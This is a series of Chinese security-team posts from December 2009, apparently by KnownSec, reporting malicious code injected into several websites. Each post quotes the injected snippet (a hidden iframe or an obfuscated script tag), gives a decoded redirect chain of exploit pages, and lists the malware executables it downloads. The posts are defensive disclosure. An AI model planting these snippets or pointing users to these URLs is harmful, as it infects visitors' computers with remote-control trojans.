                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                [iframe]http://www.70ge.com/guanggao/ad.html
            [iframe]http://www.70ge.com/guanggao/ad.html
        [iframe]http://a.mmzfc.cn/zz/a.htm?40170954
            [iframe]http://dddertsa.8866.org/auto/imgasp/asp.html?za
                [iframe]http://dddertsa.8866.org/auto/imgasp/share.html
                    [iframe]http://dddertsa.8866.org/auto/imgasp/a4.htm
                    [iframe]http://dddertsa.8866.org/auto/imgasp/ubb.htm
                    [iframe]http://dddertsa.8866.org/auto/imgasp/a90.htm
                    [iframe]http://dddertsa.8866.org/auto/imgasp/ring.htm
                    [iframe]http://dddertsa.8866.org/auto/imgasp/rings.htm
            [iframe]http://www.70ge.com/guanggao/ad.html
                [iframe]http://youhun3.3322.org/auto/imgasp/asp.html?z9
        [iframe]http://a.mmzfc.cn/zz/11.htm?40170954
            [iframe]http://nmnfgjfj.3322.org/auto/add/asp.html?03
            [iframe]http://www.70ge.com/guanggao/ad.html
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
            [iframe]http://fffsder.7766.org/htmlasp/imgasp/share.html
                [iframe]http://fffsder.7766.org/htmlasp/imgasp/a4.htm
                    [script]http://fffsder.7766.org/htmlasp/imgasp/14.js
                        [exe]http://temp.ismydns.com.cn/sys/img.css
                    [script]http://fffsder.7766.org/htmlasp/imgasp/15.js
                    [script]http://fffsder.7766.org/htmlasp/imgasp/17.js
                    [script]http://fffsder.7766.org/htmlasp/imgasp/16.js
                    [script]http://fffsder.7766.org/htmlasp/imgasp/18.js
                    [script]http://fffsder.7766.org/htmlasp/imgasp/19.js
                [iframe]http://fffsder.7766.org/htmlasp/imgasp/ubb.htm
                    [script]http://fffsder.7766.org/htmlasp/imgasp/ll.jpg
                    [script]http://fffsder.7766.org/htmlasp/imgasp/ll1.jpg
                    [script]http://fffsder.7766.org/htmlasp/imgasp/upp.jpg
                        [exe]http://temp.ismydns.com.cn/sys/img.css
                    [script]http://fffsder.7766.org/htmlasp/imgasp/llll1.jpg
                    [script]http://fffsder.7766.org/htmlasp/imgasp/llll.jpg
                    [script]http://fffsder.7766.org/htmlasp/imgasp/lllll.jpg
                [iframe]http://fffsder.7766.org/htmlasp/imgasp/a90.htm
                    [script]http://fffsder.7766.org/htmlasp/imgasp/uuub.jpg
                        [exe]http://temp.ismydns.com.cn/sys/img.css
                    [script]http://fffsder.7766.org/htmlasp/imgasp/91.js
                    [script]http://fffsder.7766.org/htmlasp/imgasp/90.js
                [iframe]http://fffsder.7766.org/htmlasp/imgasp/ring.htm
                    [iframe]http://fffsder.7766.org/htmlasp/imgasp/uuf.htm
                        [iframe]http://fffsder.7766.org/htmlasp/imgasp/i1.htm
                            [script]http://fffsder.7766.org/htmlasp/imgasp/swfobject.js
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/i115.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/i47.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/i45.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/i64.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                        [iframe]http://fffsder.7766.org/htmlasp/imgasp/f2.htm
                            [script]http://fffsder.7766.org/htmlasp/imgasp/swfobject.js
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/f115.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/f47.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/f45.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                            [flash]http://fffsder.7766.org/htmlasp/imgasp/f64.swf
                                [exe]http://temp.ismydns.com.cn/sys/img.css
                        [iframe]http://fffsder.7766.org/htmlasp/imgasp/i1.htm
                    [iframe]http://fffsder.7766.org/htmlasp/imgasp/ukf.htm
                        [script]http://fffsder.7766.org/htmlasp/imgasp/oopk.jpg
                            [exe]http://temp.ismydns.com.cn/sys/img.css
                        [script]http://fffsder.7766.org/htmlasp/imgasp/ahg.jpg
                        [script]http://fffsder.7766.org/htmlasp/imgasp/ahm.jpg
                [iframe]http://fffsder.7766.org/htmlasp/imgasp/rings.htm
                    [iframe]http://fffsder.7766.org/htmlasp/imgasp/a10.htm
        [iframe]http://a.ppmmoo.cn/tj.htm
            [iframe]http://www.70ge.com/guanggao/ad.html

最终下载病毒文件:
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe
http://fuck.ss.la/4.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:11
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 13 Dec 2009 No Comments

多摩吧被植入恶意代码

发布时间:Sat Dec 12 2009 21:32:20 UTC+0800
最后更新时间:Sat Dec 12 2009 21:32:20 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 多摩吧(http://www.demo8.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.demo8.cn/

网页被嵌入恶意链接代码:
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.demo8.cn/
    [script]http://www.demo8.cn/in_top.js
        [script]http://www.unionbig.com/c.html?p=526&t=1&a=&k=2&z=0&s=0&n=10
        [script]http://www.cfbase.com/logo.gif?1a2a3ssssa
            [iframe]http://fhod.9966.org/htmlasp/loghtml/log.html?l
                [iframe]http://fhod.9966.org/htmlasp/loghtml/share.html
                    [iframe]http://fhod.9966.org/htmlasp/loghtml/a4.htm
                        [script]http://fhod.9966.org/htmlasp/loghtml/14.js
                            [exe]http://temp.ismydns.com.cn/playcom/log.css
                        [script]http://fhod.9966.org/htmlasp/loghtml/15.js
                        [script]http://fhod.9966.org/htmlasp/loghtml/17.js
                        [script]http://fhod.9966.org/htmlasp/loghtml/16.js
                        [script]http://fhod.9966.org/htmlasp/loghtml/18.js
                        [script]http://fhod.9966.org/htmlasp/loghtml/19.js
                    [iframe]http://fhod.9966.org/htmlasp/loghtml/ubb.htm
                        [script]http://fhod.9966.org/htmlasp/loghtml/ll.jpg
                        [script]http://fhod.9966.org/htmlasp/loghtml/ll1.jpg
                        [script]http://fhod.9966.org/htmlasp/loghtml/upp.jpg
                            [exe]http://temp.ismydns.com.cn/playcom/log.css
                        [script]http://fhod.9966.org/htmlasp/loghtml/llll1.jpg
                        [script]http://fhod.9966.org/htmlasp/loghtml/llll.jpg
                        [script]http://fhod.9966.org/htmlasp/loghtml/lllll.jpg
                    [iframe]http://fhod.9966.org/htmlasp/loghtml/a90.htm
                        [script]http://fhod.9966.org/htmlasp/loghtml/uuub.jpg
                            [exe]http://temp.ismydns.com.cn/playcom/log.css
                        [script]http://fhod.9966.org/htmlasp/loghtml/91.js
                        [script]http://fhod.9966.org/htmlasp/loghtml/90.js
                    [iframe]http://fhod.9966.org/htmlasp/loghtml/ring.htm
                        [iframe]http://fhod.9966.org/htmlasp/loghtml/uuf.htm
                            [iframe]http://fhod.9966.org/htmlasp/loghtml/i1.htm
                                [script]http://fhod.9966.org/htmlasp/loghtml/swfobject.js
                                [flash]http://fhod.9966.org/htmlasp/loghtml/i115.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/i47.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/i45.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/i64.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                            [iframe]http://fhod.9966.org/htmlasp/loghtml/f2.htm
                                [script]http://fhod.9966.org/htmlasp/loghtml/swfobject.js
                                [flash]http://fhod.9966.org/htmlasp/loghtml/f115.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/f47.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/f45.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                                [flash]http://fhod.9966.org/htmlasp/loghtml/f64.swf
                                    [exe]http://temp.ismydns.com.cn/playcom/log.css
                            [iframe]http://fhod.9966.org/htmlasp/loghtml/i1.htm
                        [iframe]http://fhod.9966.org/htmlasp/loghtml/ukf.htm
                            [script]http://fhod.9966.org/htmlasp/loghtml/oopk.jpg
                                [exe]http://temp.ismydns.com.cn/playcom/log.css
                            [script]http://fhod.9966.org/htmlasp/loghtml/ahg.jpg
                            [script]http://fhod.9966.org/htmlasp/loghtml/ahm.jpg
                    [iframe]http://fhod.9966.org/htmlasp/loghtml/rings.htm
                        [iframe]http://fhod.9966.org/htmlasp/loghtml/a10.htm
        [iframe]http://www.demo8.cn/asd/txt.htm
    [script]http://www.demo8.cn/js/list4682.js
    [script]http://go.ae.tenpay.com/js/pull.js
    [script]http://neb.xorg.pl/c.js?google_ad=11×109_ad
        [iframe]http://pcb.uub.cc/88/116sd.htm
            [iframe]http://pcb.uub.cc/88/av.htm
                [iframe]http://pcb.uub.cc/88/mpie.htm
                    [script]http://pcb.uub.cc/88/ll.jpg
                    [script]http://pcb.uub.cc/88/ll1.jpg
                    [script]http://pcb.uub.cc/88/upp.jpg
                        [exe]http://pcb.uub.cc/l/yy.exe
                    [script]http://pcb.uub.cc/88/llll1.jpg
                    [script]http://pcb.uub.cc/88/llll.jpg
                    [script]http://pcb.uub.cc/88/lllll.jpg
                [iframe]http://pcb.uub.cc/88/nod.htm
                    [iframe]http://pcb.uub.cc/88/lz.htm
                        [script]http://pcb.uub.cc/88/oopk.jpg
                            [exe]http://pcb.uub.cc/l/yy.exe
                        [script]http://pcb.uub.cc/88/ll1.jpg
                        [script]http://pcb.uub.cc/88/lz.jpg
                [iframe]http://pcb.uub.cc/88/real.htm
                    [iframe]http://pcb.uub.cc/88/myra.htm
                        [script]http://pcb.uub.cc/88/myra.swf
                            [exe]http://pcb.uub.cc/l/yy.exe
                [iframe]http://pcb.uub.cc/88/rising.htm
                    [iframe]http://pcb.uub.cc/88/ofnt.htm
                        [script]http://pcb.uub.cc/88/oopk.jpg
                        [script]http://pcb.uub.cc/88/uug.jpg
            [script]http://pcb.uub.cc/88/fa.js
                [iframe]http://pcb.uub.cc/88/fa.htm
                    [iframe]http://pcb.uub.cc/88/ff.html
                    [iframe]http://pcb.uub.cc/88/ie.html
                    [iframe]http://pcb.uub.cc/88/ff.html
                    [iframe]http://pcb.uub.cc/88/ie.html
                    [iframe]http://pcb.uub.cc/88/ff.html
                    [iframe]http://pcb.uub.cc/88/ff.html
最终下载病毒文件:
http://temp.ismydns.com.cn/playcom/log.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:60
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 12 Dec 2009 No Comments

中国菜鸟学习基地被植入恶意代码

发布时间:Thu Dec 10 2009 19:50:14 UTC+0800
最后更新时间:Thu Dec 10 2009 19:50:14 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国菜鸟学习基地(http://www.cainwo.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cainwo.cn/

网页被嵌入恶意链接代码:
<script language=javascript src=http://h%62o.x%6Frg.%70l/c.js?google_ad=11×128_ad></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.cainwo.cn/
    [script]http://hbo.xorg.pl/c.js?google_ad=11×128_ad
        [iframe]http://ppe.uub.cc/99/112sd.htm
            [iframe]http://ppe.uub.cc/99/av.htm
                [iframe]http://ppe.uub.cc/99/mpie.htm
                    [script]http://ppe.uub.cc/99/ll.jpg
                    [script]http://ppe.uub.cc/99/ll1.jpg
                    [script]http://ppe.uub.cc/99/upp.jpg
                        [exe]http://ppe.uub.cc/l/ww.exe
                    [script]http://ppe.uub.cc/99/llll1.jpg
                    [script]http://ppe.uub.cc/99/llll.jpg
                    [script]http://ppe.uub.cc/99/lllll.jpg
                [iframe]http://ppe.uub.cc/99/nod.htm
                    [iframe]http://ppe.uub.cc/99/lz.htm
                        [script]http://ppe.uub.cc/99/oopk.jpg
                            [exe]http://ppe.uub.cc/l/ww.exe
                        [script]http://ppe.uub.cc/99/ll1.jpg
                        [script]http://ppe.uub.cc/99/lz.jpg
                [iframe]http://ppe.uub.cc/99/real.htm
                    [iframe]http://ppe.uub.cc/99/myra.htm
                        [script]http://ppe.uub.cc/99/myra.swf
                            [exe]http://ppe.uub.cc/l/ww.exe
                [iframe]http://ppe.uub.cc/99/rising.htm
                    [iframe]http://ppe.uub.cc/99/ofnt.htm
                        [script]http://ppe.uub.cc/99/oopk.jpg
                        [script]http://ppe.uub.cc/99/uug.jpg
            [script]http://ppe.uub.cc/99/fa.js
                [iframe]http://ppe.uub.cc/99/fa.htm
                    [iframe]http://ppe.uub.cc/99/ff.html
                    [iframe]http://ppe.uub.cc/99/ie.html
                    [iframe]http://ppe.uub.cc/99/ff.html
                    [iframe]http://ppe.uub.cc/99/ie.html
                    [iframe]http://ppe.uub.cc/99/ff.html
                    [iframe]http://ppe.uub.cc/99/ff.html
    [script]http://www.cainwo.cn/hack/count.php?fid=1
        [script]http://www.cainwo.cn/hack.php?hack=count&fid=1&nowurl=&fromurl=&windows_lang=&screen_size=
            [script]http://hbo.xorg.pl/c.js?google_ad=11×128_ad
最终下载病毒文件:
http://ppe.uub.cc/l/ww.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:8
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 10 Dec 2009 No Comments

中国绿色消费网被植入恶意代码

发布时间:Tue Dec 8 2009 21:15:38 UTC+0800
最后更新时间:Tue Dec 8 2009 21:15:38 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国绿色消费网(http://www.green.org.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.green.org.cn/

网页被嵌入恶意链接代码:
<script src=http://8881.ss.la/></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.green.org.cn/
    [script]http://8881.ss.la/
        [iframe]http://567890.ss.la/5/google.htm
            [iframe]http://567890.ss.la/4/search.htm
                [script]http://567890.ss.la/4/google_ad.js
                    [iframe]http://567890.ss.la/4/cqqmp.htm
                        [script]http://567890.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://567890.ss.la/4/show.jpg
                            [script]
                        [script]http://567890.ss.la/4/shows.jpg
                [script]http://567890.ss.la/4/google_ads.js
                    [iframe]http://567890.ss.la/4/ec1.htm
                        [script]http://567890.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://567890.ss.la/4/fyfl.htm
                    [iframe]http://567890.ss.la/4/ecof.htm
                        [script]http://567890.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://567890.ss.la/4/fydvd.htm
                    [iframe]http://567890.ss.la/4/fycry.htm
                        [script]http://567890.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://567890.ss.la/4/google_adx.js
                    [iframe]http://567890.ss.la/4/cqq0.htm
                        [script]http://567890.ss.la/4/cqq2s.css
                        [script]http://567890.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://567890.ss.la/4/ecb.htm
                        [iframe]http://567890.ss.la/4/ecbbb.htm
                            [script]http://567890.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://567890.ss.la/4/fyr.htm
                        [script]http://567890.ss.la/4/rr.js
                            [iframe]http://567890.ss.la/4/evilr.htm
                                [script]http://567890.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://567890.ss.la/4/fyre1.htm
                                [script]http://567890.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://567890.ss.la/4/zz.js
                            [iframe]http://567890.ss.la/4/fylz.htm
                                [script]http://567890.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://567890.ss.la/4/ecfox.htm
                        [iframe]http://567890.ss.la/4/ecffx.htm
                            [script]http://567890.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://567890.ss.la/4/music.js
                    [iframe]http://567890.ss.la/4/sfpf.htm
        [iframe]http://iuqwh.8800.org/asuhd/index.htm?ly
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件:
http://fuck.ss.la/4.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:3
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 08 Dec 2009 No Comments

Mozilla 中国被植入恶意代码

发布时间:Mon Dec 7 2009 22:10:57 UTC+0800
最后更新时间:Mon Dec 7 2009 22:10:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 Mozilla 中国(http://www.mozillacn.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.mozillacn.com/

网页被嵌入恶意链接代码:
<iframe src=http://for44.3322.org/1.htm width=0 height=0></iframe>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.mozillacn.com/
    [iframe]http://for44.3322.org/1.htm
        [iframe]http://for23.3322.org/360.html
            [iframe]http://for23.3322.org/yt.htm
                [script]http://for23.3322.org/nop.jpg
                [script]http://for23.3322.org/ml.jpg
                [script]http://for23.3322.org/rl.jpg
                    [exe]http://for23.3322.org/for22.exe
                [script]http://for23.3322.org/kl.jpg
            [iframe]http://for23.3322.org/ytu.htm
                [iframe]http://for23.3322.org/of.htm
                    [script]http://for23.3322.org/rl.jpg
                    [script]http://for23.3322.org/nop.jpg
                    [script]http://for23.3322.org/fq.jpg
                [iframe]http://for23.3322.org/yut.htm
            [iframe]http://for23.3322.org/yt2.htm
        [iframe]http://for23.3322.org/yt2.htm
            [script]http://for23.3322.org/a.jpg
            [script]http://for23.3322.org/b.jpg
            [script]http://for23.3322.org/url.jpg
                [exe]http://for2.3322.org/ie4.exe
            [script]http://for23.3322.org/c.jpg
            [script]http://for23.3322.org/d.jpg
            [script]http://for23.3322.org/e.jpg
            [script]http://for23.3322.org/f.jpg
        [iframe]http://www.dnfwg8.com
            [script]http://date.js
            [script]http://date.js
            [script]http://date.js
            [script]http://date.js
            [script]http://date.js
            [script]http://date.js
    [script]http://js.users.51.la/1358961.js
    [exe]http://for2.3322.org/for4.exe
最终下载病毒文件:
http://for23.3322.org/for22.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:3
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 07 Dec 2009 No Comments

牛盘网被植入恶意代码

发布时间:Fri Dec 4 2009 21:47:30 UTC+0800
最后更新时间:Fri Dec 4 2009 21:47:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 牛盘网(http://www.niupan.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://lx.niupan.com/xingjiankang/yt.htm

网页被嵌入恶意链接代码:
<iframe height=0 width=0 src=”http://www.taozhi.cc/new/2008/yt.htm?0鼀嚄4″></iframe>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://lx.niupan.com/xingjiankang/yt.htm?123
    [iframe]http://www.taozhi.cc/new/2008/yt.htm?0鼀嚄4
        [script]http://www.taozhi.cc/new/2008/nop.jpg
        [script]http://www.taozhi.cc/new/2008/ml.jpg
        [script]http://www.taozhi.cc/new/2008/rl.jpg
            [exe]http://www.itonghui.com/css/152.css
        [script]http://www.taozhi.cc/new/2008/kl.jpg
最终下载病毒文件:
http://www.itonghui.com/css/152.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 04 Dec 2009 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.